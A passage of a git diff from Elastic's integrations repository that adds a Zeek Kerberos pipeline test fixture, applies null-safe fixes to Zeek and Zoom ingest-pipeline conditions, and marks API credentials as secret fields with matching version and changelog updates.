{"preview":false,"offset":0,"result":{"_bkt":"main~0~0758E7C3-1D0C-4B2B-8CF0-682BFEA86CDC","_cd":"0:12","_indextime":"1608752616","_raw":"{\"ts\":1507565599.590346,\"uid\":\"C56Flhb4WQBNkfMOl\",\"id.orig_h\":\"192.168.10.31\",\"id.orig_p\":49242,\"id.resp_h\":\"192.168.10.10\",\"id.resp_p\":88,\"request_type\":\"TGS\",\"client\":\"RonHD/CONTOSO.LOCAL\",\"service\":\"HOST/admin-pc\",\"success\":true,\"till\":2136422885.0,\"cipher\":\"aes256-cts-hmac-sha1-96\",\"forwardable\":true,\"renewable\":true,\"cert.client_subject\":\"CN=*.gcp.cloud.es.io,O=Elasticsearch\\u005c, Inc.,L=Mountain View,ST=California,C=US\",\"cert.server_subject\":\"CN=*.gcp.cloud.es.io,O=Elasticsearch\\u005c, Inc.,L=Mountain View,ST=California,C=US\"}","_serial":"0","_si":["b590508aafed","main"],"_sourcetype":"access_log-too_small","_time":"2020-12-23 19:43:35.000 UTC","host":"Lees-MBP.localdomain","index":"main","linecount":"1","my_max":"1608759317","source":"/usr/local/var/log/zeek/kerberos.log","sourcetype":"access_log-too_small","splunk_server":"b590508aafed"}} +{"preview":false,"offset":0,"result":{"_bkt":"main~0~0758E7C3-1D0C-4B2B-8CF0-682BFEA86CDC","_cd":"0:12","_indextime":"1608752616","_raw":"{\"ts\":1507565599.590346,\"uid\":\"C56Flhb4WQBNkfMOl\",\"id.orig_h\":\"192.168.10.31\",\"id.orig_p\":49242,\"id.resp_h\":\"192.168.10.10\",\"id.resp_p\":88,\"request_type\":\"TGS\",\"client\":\"RonHD/CONTOSO.LOCAL\",\"service\":\"HOST/admin-pc\",\"success\":true,\"till\":2136422885.0,\"cipher\":\"aes256-cts-hmac-sha1-96\",\"forwardable\":true,\"renewable\":true}","_serial":"0","_si":["b590508aafed","main"],"_sourcetype":"access_log-too_small","_time":"2020-12-23 19:43:35.000 UTC","host":"Lees-MBP.localdomain","index":"main","linecount":"1","my_max":"1608759317","source":"/usr/local/var/log/zeek/kerberos.log","sourcetype":"access_log-too_small","splunk_server":"b590508aafed"}} diff --git a/packages/zeek/data_stream/kerberos/_dev/test/pipeline/test-kerberos.log-expected.json b/packages/zeek/data_stream/kerberos/_dev/test/pipeline/test-kerberos.log-expected.json index 6c58b3340df..8c7f611580f 100644 --- a/packages/zeek/data_stream/kerberos/_dev/test/pipeline/test-kerberos.log-expected.json +++ b/packages/zeek/data_stream/kerberos/_dev/test/pipeline/test-kerberos.log-expected.json @@ -261,6 +261,89 @@ }, "session_id": "C56Flhb4WQBNkfMOl" } + }, + { + "@timestamp": "2017-10-09T16:13:19.590Z", + "client": { + "address": "192.168.10.31" + }, + "destination": { + "address": "192.168.10.10", + "ip": "192.168.10.10", + "port": 88 + }, + "ecs": { + "version": "8.11.0" + }, + "event": { + "action": "TGS", + "category": [ + "network", + "authentication" + ], + "created": "2020-04-28T11:07:58.223Z", + "id": "C56Flhb4WQBNkfMOl", + "kind": "event", + "original": "{\"ts\":1507565599.590346,\"uid\":\"C56Flhb4WQBNkfMOl\",\"id.orig_h\":\"192.168.10.31\",\"id.orig_p\":49242,\"id.resp_h\":\"192.168.10.10\",\"id.resp_p\":88,\"request_type\":\"TGS\",\"client\":\"RonHD/CONTOSO.LOCAL\",\"service\":\"HOST/admin-pc\",\"success\":true,\"till\":2136422885.0,\"cipher\":\"aes256-cts-hmac-sha1-96\",\"forwardable\":true,\"renewable\":true}", + "outcome": "success", + "type": [ + "connection", + "protocol", + "access" + ] + }, + "host": { + "name": "Lees-MBP.localdomain" + }, + "log": { + "file": { + "path": "/usr/local/var/log/zeek/kerberos.log" + } + }, + "network": { + "community_id": "1:DW/lSsosl8gZ8pqO9kKMm7cZheQ=", + "protocol": "kerberos", + "transport": "tcp" + }, + "related": { + "ip": [ + "192.168.10.31", + "192.168.10.10" + ], + "user": [ + "RonHD" + ] + }, + "server": { + "address": "192.168.10.10" + }, + "source": { + "address": "192.168.10.31", + "ip": "192.168.10.31", + "port": 49242 + }, + "tags": [ + "preserve_original_event" + ], + "user": { + "domain": "CONTOSO.LOCAL", + "name": "RonHD" + }, + "zeek": { + "kerberos": { + "cipher": "aes256-cts-hmac-sha1-96", + "client": "RonHD/CONTOSO.LOCAL", + "forwardable": true, + "renewable": true, + "request_type": "TGS", + "service": "HOST/admin-pc", + "success": true, + "valid": { + "until": "2037-09-13T02:48:05.000Z" + } + }, + "session_id": "C56Flhb4WQBNkfMOl" + } } ] } \ No newline at end of file diff --git a/packages/zeek/data_stream/kerberos/elasticsearch/ingest_pipeline/default.yml b/packages/zeek/data_stream/kerberos/elasticsearch/ingest_pipeline/default.yml index b3e6a658791..f661599b05b 100644 --- a/packages/zeek/data_stream/kerberos/elasticsearch/ingest_pipeline/default.yml +++ b/packages/zeek/data_stream/kerberos/elasticsearch/ingest_pipeline/default.yml @@ -182,7 +182,7 @@ processors: field: zeek.kerberos.client pattern: "%{user.name}/%{user.domain}" ignore_missing: true - if: ctx.zeek?.kerberos?.client.contains('/') == true + if: ctx.zeek?.kerberos?.client?.contains('/') == true - date: field: zeek.kerberos.ts formats: diff --git a/packages/zeek/data_stream/known_certs/elasticsearch/ingest_pipeline/default.yml b/packages/zeek/data_stream/known_certs/elasticsearch/ingest_pipeline/default.yml index 38bba9f63cf..c8d3b85866f 100644 --- a/packages/zeek/data_stream/known_certs/elasticsearch/ingest_pipeline/default.yml +++ b/packages/zeek/data_stream/known_certs/elasticsearch/ingest_pipeline/default.yml @@ -43,11 +43,11 @@ processors: - set: field: network.type value: ipv4 - if: ctx.host?.ip.contains('.') == true + if: ctx.host?.ip?.contains('.') == true - set: field: network.type value: ipv6 - if: ctx.host?.ip.contains(':') == true + if: ctx.host?.ip?.contains(':') == true - append: field: related.ip value: "{{{host.ip}}}" diff --git a/packages/zeek/data_stream/known_hosts/elasticsearch/ingest_pipeline/default.yml b/packages/zeek/data_stream/known_hosts/elasticsearch/ingest_pipeline/default.yml index aa27ebf3ffc..53471b81cd2 100644 --- a/packages/zeek/data_stream/known_hosts/elasticsearch/ingest_pipeline/default.yml +++ b/packages/zeek/data_stream/known_hosts/elasticsearch/ingest_pipeline/default.yml @@ -43,11 +43,11 @@ processors: - set: field: network.type value: ipv4 - if: ctx.host?.ip.contains('.') == true + if: ctx.host?.ip?.contains('.') == true - set: field: network.type value: ipv6 - if: ctx.host?.ip.contains(':') == true + if: ctx.host?.ip?.contains(':') == true - append: field: related.ip value: "{{{host.ip}}}" diff --git a/packages/zeek/data_stream/known_services/elasticsearch/ingest_pipeline/default.yml b/packages/zeek/data_stream/known_services/elasticsearch/ingest_pipeline/default.yml index ae5e9abe82d..61d89161b5d 100644 --- a/packages/zeek/data_stream/known_services/elasticsearch/ingest_pipeline/default.yml +++ b/packages/zeek/data_stream/known_services/elasticsearch/ingest_pipeline/default.yml @@ -42,11 +42,11 @@ processors: - set: field: network.type value: ipv4 - if: ctx.host?.ip.contains('.') == true + if: ctx.host?.ip?.contains('.') == true - set: field: network.type value: ipv6 - if: ctx.host?.ip.contains(':') == true + if: ctx.host?.ip?.contains(':') == true - append: field: related.ip value: "{{{host.ip}}}" diff --git a/packages/zeek/data_stream/ntp/elasticsearch/ingest_pipeline/default.yml b/packages/zeek/data_stream/ntp/elasticsearch/ingest_pipeline/default.yml index 07d06d81844..06ebc6f8402 100644 --- a/packages/zeek/data_stream/ntp/elasticsearch/ingest_pipeline/default.yml +++ b/packages/zeek/data_stream/ntp/elasticsearch/ingest_pipeline/default.yml @@ -92,11 +92,11 @@ processors: - set: field: network.type value: ipv4 - if: ctx.source?.ip.contains('.') == true + if: ctx.source?.ip?.contains('.') == true - set: field: network.type value: ipv6 - if: ctx.source?.ip.contains(':') == true + if: ctx.source?.ip?.contains(':') == true - community_id: ignore_missing: true - date: diff --git a/packages/zeek/data_stream/signature/elasticsearch/ingest_pipeline/default.yml b/packages/zeek/data_stream/signature/elasticsearch/ingest_pipeline/default.yml index d972399573f..d7b0f18f749 100644 --- a/packages/zeek/data_stream/signature/elasticsearch/ingest_pipeline/default.yml +++ b/packages/zeek/data_stream/signature/elasticsearch/ingest_pipeline/default.yml @@ -80,11 +80,11 @@ processors: - set: field: network.type value: ipv4 - if: ctx.source?.ip.contains('.') == true + if: ctx.source?.ip?.contains('.') == true - set: field: network.type value: ipv6 - if: ctx.source?.ip.contains(':') == true + if: ctx.source?.ip?.contains(':') == true - append: field: related.ip value: "{{{source.ip}}}" diff --git a/packages/zeek/data_stream/smb_cmd/elasticsearch/ingest_pipeline/default.yml b/packages/zeek/data_stream/smb_cmd/elasticsearch/ingest_pipeline/default.yml index 2e5785f968c..2e74021fba2 100644 --- a/packages/zeek/data_stream/smb_cmd/elasticsearch/ingest_pipeline/default.yml +++ b/packages/zeek/data_stream/smb_cmd/elasticsearch/ingest_pipeline/default.yml @@ -265,15 +265,15 @@ processors: - append: field: event.type value: error - if: "ctx.zeek?.smb_cmd?.status != null && ctx.zeek.smb_cmd.status.toLowerCase() != 'success'" + if: "ctx.zeek?.smb_cmd?.status != null && ctx.zeek.smb_cmd.status.equalsIgnoreCase('success') == false" - set: field: event.outcome value: success - if: "ctx.zeek?.smb_cmd?.status != null && ctx.zeek.smb_cmd.status.toLowerCase() == 'success'" + if: "ctx.zeek?.smb_cmd?.status != null && ctx.zeek.smb_cmd.status.equalsIgnoreCase('success') == true" - set: field: event.outcome value: failure - if: "ctx.zeek?.smb_cmd?.status != null && ctx.zeek.smb_cmd.status.toLowerCase() != 'success'" + if: "ctx.zeek?.smb_cmd?.status != null && ctx.zeek.smb_cmd.status.equalsIgnoreCase('success') == false" - community_id: target_field: network.community_id - remove: diff --git a/packages/zeek/data_stream/software/elasticsearch/ingest_pipeline/default.yml b/packages/zeek/data_stream/software/elasticsearch/ingest_pipeline/default.yml index a59466b57cd..fd8b49c4ddd 100644 --- a/packages/zeek/data_stream/software/elasticsearch/ingest_pipeline/default.yml +++ b/packages/zeek/data_stream/software/elasticsearch/ingest_pipeline/default.yml @@ -47,11 +47,11 @@ processors: - set: field: network.type value: ipv4 - if: ctx.host?.ip.contains('.') == true + if: ctx.host?.ip?.contains('.') == true - set: field: network.type value: ipv6 - if: ctx.host?.ip.contains(':') == true + if: ctx.host?.ip?.contains(':') == true - append: field: related.ip value: "{{{host.ip}}}" diff --git a/packages/zeek/data_stream/ssl/elasticsearch/ingest_pipeline/default.yml b/packages/zeek/data_stream/ssl/elasticsearch/ingest_pipeline/default.yml index 72d9a06083c..94437f2bcd6 100644 --- a/packages/zeek/data_stream/ssl/elasticsearch/ingest_pipeline/default.yml +++ b/packages/zeek/data_stream/ssl/elasticsearch/ingest_pipeline/default.yml @@ -477,19 +477,16 @@ processors: lang: painless if: ctx.zeek?.ssl?.version != null source: >- - def parts = ctx.zeek.ssl.version.splitOnToken("v"); if (parts.length != 2) { - - + def parts = ctx.zeek.ssl.version.splitOnToken("v"); + if (parts.length != 2) { return; - } if (parts[0] == "SSL") { - - + } + if (parts[0] == "SSL") { ctx.tls.version = parts[1] + ".0"; } else { - - ctx.tls.version = parts[1].substring(0,1) + "." + parts[1].substring(1); - } ctx.tls.version_protocol = parts[0].toLowerCase(); + } + ctx.tls.version_protocol = parts[0].toLowerCase(); - rename: field: zeek.ssl.ja3 target_field: tls.client.ja3 diff --git a/packages/zeek/manifest.yml b/packages/zeek/manifest.yml index d625e42fad1..285032ce925 100644 --- a/packages/zeek/manifest.yml +++ b/packages/zeek/manifest.yml @@ -1,6 +1,6 @@ name: zeek title: Zeek -version: "2.22.3" +version: "2.24.0" description: Collect logs from Zeek with Elastic Agent. type: integration icons: @@ -8,11 +8,11 @@ icons: title: zeek size: 214x203 type: image/svg+xml -format_version: "3.0.0" +format_version: "3.0.3" categories: [network, security] conditions: kibana: - version: ^8.7.1 + version: ^8.12.0 screenshots: - src: /img/kibana-zeek.png title: kibana zeek @@ -59,6 +59,7 @@ policy_templates: title: Splunk REST API Password show_user: true required: false + secret: true - name: token type: password title: Splunk Authorization Token @@ -68,6 +69,7 @@ policy_templates: and password. show_user: true required: false + secret: true - name: ssl type: yaml title: SSL Configuration diff --git a/packages/zerofox/changelog.yml b/packages/zerofox/changelog.yml index f2cd54601df..64cdee93c27 100644 --- a/packages/zerofox/changelog.yml +++ b/packages/zerofox/changelog.yml @@ -1,4 +1,9 @@ # newer versions go on top +- version: "1.23.0" + changes: + - description: Set sensitive values as secret. + type: enhancement + link: https://github.com/elastic/integrations/pull/9129 - version: "1.22.1" changes: - description: Changed owners diff --git a/packages/zerofox/manifest.yml b/packages/zerofox/manifest.yml index 4ec1d90a8fe..1a29f22d99e 100644 --- a/packages/zerofox/manifest.yml +++ b/packages/zerofox/manifest.yml @@ -1,9 +1,9 @@ name: zerofox title: ZeroFox -version: "1.22.1" +version: "1.23.0" description: Collect logs from ZeroFox with Elastic Agent. type: integration -format_version: "3.0.0" +format_version: "3.0.2" icons: - src: /img/logo.svg title: logo ZeroFox @@ -13,7 +13,7 @@ categories: - security conditions: kibana: - version: ^8.7.1 + version: ^8.12.0 policy_templates: - name: zerofox title: ZeroFox Alerts @@ -50,6 +50,7 @@ policy_templates: multi: false required: true show_user: true + secret: true - name: initial_interval type: text title: Initial Interval diff --git a/packages/zeronetworks/changelog.yml b/packages/zeronetworks/changelog.yml index b2ae7b4c991..26169c52fe1 100644 --- a/packages/zeronetworks/changelog.yml +++ b/packages/zeronetworks/changelog.yml @@ -1,4 +1,9 @@ # newer versions go on top +- version: "1.12.0" + changes: + - description: Set sensitive values as secret. + type: enhancement + link: https://github.com/elastic/integrations/pull/9129 - version: "1.11.1" changes: - description: Changed owners diff --git a/packages/zeronetworks/data_stream/audit/manifest.yml b/packages/zeronetworks/data_stream/audit/manifest.yml index 6a68fbcb780..3cb9a17bfd8 100644 --- a/packages/zeronetworks/data_stream/audit/manifest.yml +++ b/packages/zeronetworks/data_stream/audit/manifest.yml @@ -13,6 +13,7 @@ streams: multi: false required: true show_user: true + secret: true - name: interval type: text title: Interval diff --git a/packages/zeronetworks/manifest.yml b/packages/zeronetworks/manifest.yml index 4091ec53426..2c57557fa7f 100644 --- a/packages/zeronetworks/manifest.yml +++ b/packages/zeronetworks/manifest.yml @@ -1,7 +1,7 @@ -format_version: "3.0.0" +format_version: "3.0.2" name: zeronetworks title: "Zero Networks" -version: "1.11.1" +version: "1.12.0" source: license: "Elastic-2.0" description: "Zero Networks Logs integration" @@ -10,7 +10,7 @@ categories: - security conditions: kibana: - version: "^8.6.2" + version: "^8.12.0" elastic: subscription: "basic" screenshots: diff --git a/packages/zoom/changelog.yml b/packages/zoom/changelog.yml index 4798bd7b4f3..6556912fd5a 100644 --- a/packages/zoom/changelog.yml +++ b/packages/zoom/changelog.yml @@ -1,4 +1,14 @@ # newer versions go on top +- version: "1.19.0" + changes: + - description: Set sensitive values as secret. + type: enhancement + link: https://github.com/elastic/integrations/pull/9129 +- version: "1.18.1" + changes: + - description: Fix ingest pipeline conditional field handling. + type: bugfix + link: https://github.com/elastic/integrations/pull/9077 - version: 1.18.0 changes: - description: ECS version updated to 8.11.0. diff --git a/packages/zoom/data_stream/webhook/elasticsearch/ingest_pipeline/account.yml b/packages/zoom/data_stream/webhook/elasticsearch/ingest_pipeline/account.yml index 50923953743..568feef3d3c 100644 --- a/packages/zoom/data_stream/webhook/elasticsearch/ingest_pipeline/account.yml +++ b/packages/zoom/data_stream/webhook/elasticsearch/ingest_pipeline/account.yml @@ -7,18 +7,23 @@ processors: - append: field: event.category value: configuration - if: "['account.settings_updated'].contains(ctx?.event?.action)" + if: ctx.event?.action == 'account.settings_updated' - append: field: event.type value: user - append: field: event.type value: creation - if: ctx?.event?.action == 'account.created' + if: ctx.event?.action == 'account.created' - append: field: event.type value: change - if: "['account.updated', 'account.settings_updated', 'account.disassociated'].contains(ctx?.event?.action)" + if: >- + [ + 'account.updated', + 'account.settings_updated', + 'account.disassociated' + ].contains(ctx.event?.action) - rename: field: zoom.account_id target_field: zoom.master_account_id @@ -32,7 +37,7 @@ processors: target_field: '@timestamp' formats: - UNIX_MS - if: ctx?.zoom?.time_stamp != null + if: ctx.zoom?.time_stamp != null ignore_failure: true - rename: field: zoom.object @@ -43,11 +48,11 @@ processors: # - set: field: user.target.id - value: '{{zoom.account.owner_id}}' + value: '{{{zoom.account.owner_id}}}' ignore_empty_value: true - set: field: user.target.email - value: '{{zoom.account.owner_email}}' + value: '{{{zoom.account.owner_email}}}' ignore_empty_value: true # @@ -55,57 +60,57 @@ processors: # - set: field: user.target.id - value: '{{zoom.old_values.id}}' - if: 'ctx.zoom?.old_values?.id != null' + value: '{{{zoom.old_values.id}}}' + if: ctx.zoom?.old_values?.id != null - set: field: user.target.email - value: '{{zoom.old_values.account_email}}' - if: 'ctx.zoom?.old_values?.account_email != null' + value: '{{{zoom.old_values.account_email}}}' + if: ctx.zoom?.old_values?.account_email != null - set: field: user.target.full_name - value: '{{zoom.old_values.account_name}}' - if: 'ctx.zoom?.old_values?.account_name != null' + value: '{{{zoom.old_values.account_name}}}' + if: ctx.zoom?.old_values?.account_name != null - set: field: user.target.name - value: '{{zoom.old_values.account_alias}}' - if: 'ctx.zoom?.old_values?.account_alias != null' + value: '{{{zoom.old_values.account_alias}}}' + if: ctx.zoom?.old_values?.account_alias != null # # set user.changes from account.account_* fields (updated account). # - set: field: user.changes.id - value: '{{zoom.account.id}}' - if: 'ctx.zoom?.account?.id != null && ctx.zoom?.old_values?.id != ctx.zoom?.account?.id' + value: '{{{zoom.account.id}}}' + if: ctx.zoom?.account?.id != null && ctx.zoom?.old_values?.id != ctx.zoom?.account?.id - set: field: user.changes.email - value: '{{zoom.account.account_email}}' - if: 'ctx.zoom?.account?.account_email != null && ctx.zoom?.old_values?.account_email != ctx.zoom?.account?.account_email' + value: '{{{zoom.account.account_email}}}' + if: ctx.zoom?.account?.account_email != null && ctx.zoom?.old_values?.account_email != ctx.zoom?.account?.account_email - set: field: user.changes.full_name - value: '{{zoom.account.account_name}}' - if: 'ctx.zoom?.account?.account_name != null && ctx.zoom?.old_values?.account_name != ctx.zoom?.account?.account_name' + value: '{{{zoom.account.account_name}}}' + if: ctx.zoom?.account?.account_name != null && ctx.zoom?.old_values?.account_name != ctx.zoom?.account?.account_name - set: field: user.changes.name - value: '{{zoom.account.account_alias}}' - if: 'ctx.zoom?.account?.account_alias != null && ctx.zoom?.old_values?.account_alias != ctx.zoom?.account?.account_alias' + value: '{{{zoom.account.account_alias}}}' + if: ctx.zoom?.account?.account_alias != null && ctx.zoom?.old_values?.account_alias != ctx.zoom?.account?.account_alias # # Append to related.user array # - append: field: related.user - value: "{{zoom.account.owner_id}}" + value: "{{{zoom.account.owner_id}}}" allow_duplicates: false if: ctx.zoom?.account?.owner_id != null - append: field: related.user - value: "{{user.target.id}}" + value: "{{{user.target.id}}}" allow_duplicates: false if: ctx.user?.target?.id != null - append: field: related.user - value: "{{user.changes.id}}" + value: "{{{user.changes.id}}}" allow_duplicates: false if: ctx.user?.changes?.id != null diff --git a/packages/zoom/data_stream/webhook/elasticsearch/ingest_pipeline/chat_channel.yml b/packages/zoom/data_stream/webhook/elasticsearch/ingest_pipeline/chat_channel.yml index 2a6546b3f48..2e54d61c70f 100644 --- a/packages/zoom/data_stream/webhook/elasticsearch/ingest_pipeline/chat_channel.yml +++ b/packages/zoom/data_stream/webhook/elasticsearch/ingest_pipeline/chat_channel.yml @@ -4,19 +4,24 @@ processors: - append: field: event.type value: user - if: "['chat_channel.member_invited', 'chat_channel.member_joined', 'chat_channel.member_left'].contains(ctx?.event?.action)" + if: >- + [ + 'chat_channel.member_invited', + 'chat_channel.member_joined', + 'chat_channel.member_left' + ].contains(ctx.event?.action) - append: field: event.type value: creation - if: ctx?.event?.action == 'chat_channel.created' + if: ctx.event?.action == 'chat_channel.created' - append: field: event.type value: deletion - if: ctx?.event?.action == 'chat_channel.deleted' + if: ctx.event?.action == 'chat_channel.deleted' - append: field: event.type value: change - if: ctx?.event?.action == 'chat_channel.updated' + if: ctx.event?.action == 'chat_channel.updated' - rename: field: zoom.object target_field: zoom.chat_channel @@ -26,30 +31,30 @@ processors: target_field: '@timestamp' formats: - UNIX_MS - if: ctx?.zoom?.chat_channel?.timestamp != null + if: ctx.zoom?.chat_channel?.timestamp != null ignore_failure: true - remove: field: zoom.chat_channel.date_time ignore_missing: true - if: ctx?.zoom?.chat_channel?.timestamp != null + if: ctx.zoom?.chat_channel?.timestamp != null - date: field: zoom.chat_channel.date_time target_field: '@timestamp' formats: - ISO_INSTANT - if: "ctx?.zoom?.chat_channel?.date_time != null && ctx?.zoom?.chat_channel?.timestamp == null" + if: ctx.zoom?.chat_channel?.date_time != null && ctx.zoom?.chat_channel?.timestamp == null ignore_failure: true - remove: field: zoom.chat_channel.timestamp ignore_missing: true - if: ctx?.zoom?.chat_channel?.timestamp != null + if: ctx.zoom?.chat_channel?.timestamp != null - foreach: field: zoom.chat_channel.members ignore_missing: true processor: append: field: related.user - value: ["{{_ingest._value.display_name}}", "{{_ingest._value.id}}"] + value: ["{{{_ingest._value.display_name}}}", "{{{_ingest._value.id}}}"] allow_duplicates: false # Removing to prevent nested values, added to related.user above - remove: diff --git a/packages/zoom/data_stream/webhook/elasticsearch/ingest_pipeline/chat_message.yml b/packages/zoom/data_stream/webhook/elasticsearch/ingest_pipeline/chat_message.yml index af3325847f3..e79b65a8a36 100644 --- a/packages/zoom/data_stream/webhook/elasticsearch/ingest_pipeline/chat_message.yml +++ b/packages/zoom/data_stream/webhook/elasticsearch/ingest_pipeline/chat_message.yml @@ -7,46 +7,46 @@ processors: - append: field: event.type value: creation - if: ctx?.event?.action == 'chat_message.sent' + if: ctx.event?.action == 'chat_message.sent' - append: field: event.type value: deletion - if: ctx?.event?.action == 'chat_message.deleted' + if: ctx.event?.action == 'chat_message.deleted' - append: field: event.type value: change - if: ctx?.event?.action == 'chat_message.updated' + if: ctx.event?.action == 'chat_message.updated' - rename: field: zoom.object target_field: zoom.chat_message ignore_missing: true - append: field: related.user - value: "{{zoom.chat_message.contact_id}}" - if: "ctx?.zoom?.chat_message?.contact_id != null" + value: "{{{zoom.chat_message.contact_id}}}" + if: ctx.zoom?.chat_message?.contact_id != null - date: field: zoom.chat_message.timestamp target_field: '@timestamp' formats: - UNIX_MS - if: ctx?.zoom?.chat_message?.timestamp != null + if: ctx.zoom?.chat_message?.timestamp != null ignore_failure: true - remove: field: zoom.chat_message.date_time ignore_missing: true - if: ctx?.zoom?.chat_message?.timestamp != null + if: ctx.zoom?.chat_message?.timestamp != null - date: field: zoom.chat_message.date_time target_field: '@timestamp' formats: - ISO_INSTANT - if: ctx?.zoom?.chat_message?.timestamp == null + if: ctx.zoom?.chat_message?.timestamp == null ignore_failure: true - remove: field: zoom.chat_message.timestamp ignore_missing: true - remove: - if: ctx?.zoom?.chat_message?.message == null + if: ctx.zoom?.chat_message?.message == null field: zoom.chat_message.message ignore_missing: true on_failure: diff --git a/packages/zoom/data_stream/webhook/elasticsearch/ingest_pipeline/default.yml b/packages/zoom/data_stream/webhook/elasticsearch/ingest_pipeline/default.yml index 4308e61ba56..6def48a876c 100644 --- a/packages/zoom/data_stream/webhook/elasticsearch/ingest_pipeline/default.yml +++ b/packages/zoom/data_stream/webhook/elasticsearch/ingest_pipeline/default.yml @@ -60,19 +60,19 @@ processors: ignore_missing: true - append: field: related.user - value: "{{zoom.operator_id}}" - if: "ctx.zoom?.operator_id != null" + value: "{{{zoom.operator_id}}}" + if: ctx.zoom?.operator_id != null # Set user.id from operator data (user who performs an action). - set: field: user.id - value: "{{zoom.operator_id}}" - if: "ctx.zoom?.operator_id != null" + value: "{{{zoom.operator_id}}}" + if: ctx.zoom?.operator_id != null # Set user.name from operator data only when user.id also set above. - set: field: user.email - value: "{{zoom.operator}}" + value: "{{{zoom.operator}}}" ignore_empty_value: true - if: "ctx.zoom?.operator_id != null" + if: ctx.zoom?.operator_id != null # Removing some fields that have complex nested arrays that might impact performance - remove: field: @@ -94,31 +94,31 @@ processors: ignore_missing: true - pipeline: name: '{{ IngestPipeline "meeting" }}' - if: "ctx?.event?.action.startsWith('meeting')" + if: ctx.event?.action?.startsWith('meeting') == true - pipeline: name: '{{ IngestPipeline "account" }}' - if: "ctx?.event?.action.startsWith('account')" + if: ctx.event?.action?.startsWith('account') == true - pipeline: name: '{{ IngestPipeline "chat_message" }}' - if: "ctx?.event?.action.startsWith('chat_message')" + if: ctx.event?.action?.startsWith('chat_message') == true - pipeline: name: '{{ IngestPipeline "chat_channel" }}' - if: "ctx?.event?.action.startsWith('chat_channel')" + if: ctx.event?.action?.startsWith('chat_channel') == true - pipeline: name: '{{ IngestPipeline "phone" }}' - if: "ctx?.event?.action.startsWith('phone')" + if: ctx.event?.action?.startsWith('phone') == true - pipeline: name: '{{ IngestPipeline "recording" }}' - if: "ctx?.event?.action.startsWith('recording')" + if: ctx.event?.action?.startsWith('recording') == true - pipeline: name: '{{ IngestPipeline "user" }}' - if: "ctx?.event?.action.startsWith('user')" + if: ctx.event?.action?.startsWith('user') == true - pipeline: name: '{{ IngestPipeline "webinar" }}' - if: "ctx?.event?.action.startsWith('webinar')" + if: ctx.event?.action?.startsWith('webinar') == true - pipeline: name: '{{ IngestPipeline "zoomroom" }}' - if: "ctx?.event?.action.startsWith('zoomroom')" + if: ctx.event?.action?.startsWith('zoomroom') == true on_failure: - set: field: event.kind diff --git a/packages/zoom/data_stream/webhook/elasticsearch/ingest_pipeline/meeting.yml b/packages/zoom/data_stream/webhook/elasticsearch/ingest_pipeline/meeting.yml index 7bc3ebe65b6..ebc2cee87a9 100644 --- a/packages/zoom/data_stream/webhook/elasticsearch/ingest_pipeline/meeting.yml +++ b/packages/zoom/data_stream/webhook/elasticsearch/ingest_pipeline/meeting.yml @@ -4,35 +4,35 @@ processors: - append: field: event.type value: info - if: ctx?.event?.action != 'meeting.alert' + if: ctx.event?.action != 'meeting.alert' - append: field: event.type value: error - if: ctx?.event?.action == 'meeting.alert' + if: ctx.event?.action == 'meeting.alert' - append: field: event.type value: allowed - if: ctx?.event?.action == 'meeting.registration_approved' + if: ctx.event?.action == 'meeting.registration_approved' - append: field: event.type value: creation - if: "['meeting.registration_created', 'meeting.created'].contains(ctx?.event?.action)" + if: "['meeting.registration_created', 'meeting.created'].contains(ctx.event?.action)" - append: field: event.type value: deletion - if: ctx?.event?.action == 'meeting.deleted' + if: ctx.event?.action == 'meeting.deleted' - append: field: event.type value: change - if: ctx?.event?.action == 'meeting.updated' + if: ctx.event?.action == 'meeting.updated' - append: field: event.type value: start - if: "['meeting.started', 'meeting.sharing_started'].contains(ctx?.event?.action)" + if: "['meeting.started', 'meeting.sharing_started'].contains(ctx.event?.action)" - append: field: event.type value: end - if: "['meeting.ended', 'meeting.sharing_ended'].contains(ctx?.event?.action)" + if: "['meeting.ended', 'meeting.sharing_ended'].contains(ctx.event?.action)" - rename: field: zoom.object target_field: zoom.meeting @@ -45,7 +45,7 @@ processors: field: zoom.registrant.join_url target_field: url.full ignore_missing: true - if: ctx?.url?.full == null + if: ctx.url?.full == null # # Set user.* from participant, if any. @@ -54,14 +54,14 @@ processors: field: - user ignore_missing: true - if: 'ctx.zoom?.participant != null' + if: ctx.zoom?.participant != null - set: field: user.id - value: '{{zoom.participant.id}}' + value: '{{{zoom.participant.id}}}' ignore_empty_value: true - set: field: user.full_name - value: '{{zoom.participant.user_name}}' + value: '{{{zoom.participant.user_name}}}' ignore_empty_value: true # @@ -69,7 +69,7 @@ processors: # - set: field: user.id - value: '{{zoom.meeting.host_id}}' + value: '{{{zoom.meeting.host_id}}}' ignore_empty_value: true override: false @@ -78,90 +78,100 @@ processors: # - append: field: related.user - value: "{{zoom.participant.id}}" + value: "{{{zoom.participant.id}}}" allow_duplicates: false - if: 'ctx.zoom?.participant?.id != null' + if: ctx.zoom?.participant?.id != null - append: field: related.user - value: "{{zoom.meeting.host_id}}" + value: "{{{zoom.meeting.host_id}}}" allow_duplicates: false - if: 'ctx.zoom?.meeting?.host_id != null' + if: ctx.zoom?.meeting?.host_id != null - date: field: zoom.meeting.start_time target_field: event.start formats: - ISO_INSTANT - if: ctx?.event?.action == 'meeting.started' + if: ctx.event?.action == 'meeting.started' ignore_failure: true - date: field: zoom.participant.sharing_details.date_time target_field: '@timestamp' formats: - ISO_INSTANT - if: ctx?.event?.action == 'meeting.sharing_started' + if: ctx.event?.action == 'meeting.sharing_started' ignore_failure: true - date: field: zoom.participant.date_time target_field: '@timestamp' formats: - ISO_INSTANT - if: "['meeting.participant_put_in_waiting_room', 'meeting.participant_joined_waiting_room', 'meeting.participant_left_waiting_room'].contains(ctx?.event?.action)" + if: >- + [ + 'meeting.participant_put_in_waiting_room', + 'meeting.participant_joined_waiting_room', + 'meeting.participant_left_waiting_room' + ].contains(ctx.event?.action) ignore_failure: true - date: field: zoom.participant.join_time target_field: '@timestamp' formats: - ISO_INSTANT - if: ctx?.event?.action == 'meeting.participant_joined' + if: ctx.event?.action == 'meeting.participant_joined' ignore_failure: true - date: field: zoom.participant.leave_time target_field: '@timestamp' formats: - ISO_INSTANT - if: ctx?.event?.action == 'meeting.participant_left' + if: ctx.event?.action == 'meeting.participant_left' ignore_failure: true - date: field: zoom.time_stamp target_field: '@timestamp' formats: - ISO_INSTANT - if: ctx?.event?.action == 'meeting.updated' + if: ctx.event?.action == 'meeting.updated' ignore_failure: true - script: lang: painless - if: ctx?.zoom?.meeting?.duration != null + if: ctx.zoom?.meeting?.duration != null source: >- ctx.event.duration = ctx.zoom.meeting.duration * 60L * 1000000000L; - remove: field: 